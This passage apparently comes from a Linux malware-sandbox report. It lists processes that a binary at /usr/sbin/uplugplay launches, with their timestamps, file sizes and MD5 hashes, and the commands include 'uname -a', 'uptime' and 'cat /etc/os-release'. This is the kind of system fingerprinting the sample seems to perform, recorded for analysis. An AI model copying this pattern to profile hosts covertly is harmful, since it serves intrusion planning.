          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/cat
          Arguments:cat /etc/os-release
          File size:52080 bytes
          MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c uptime
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/bin/uptime
          Arguments:uptime
          File size:10576 bytes
          MD5 hash:8796b6264c7fd70904d2192ddb5ebf9a

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "uname -a"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/uname
          Arguments:uname -a
          File size:31440 bytes
          MD5 hash:1078d9dca4e90919f7b2433cae105008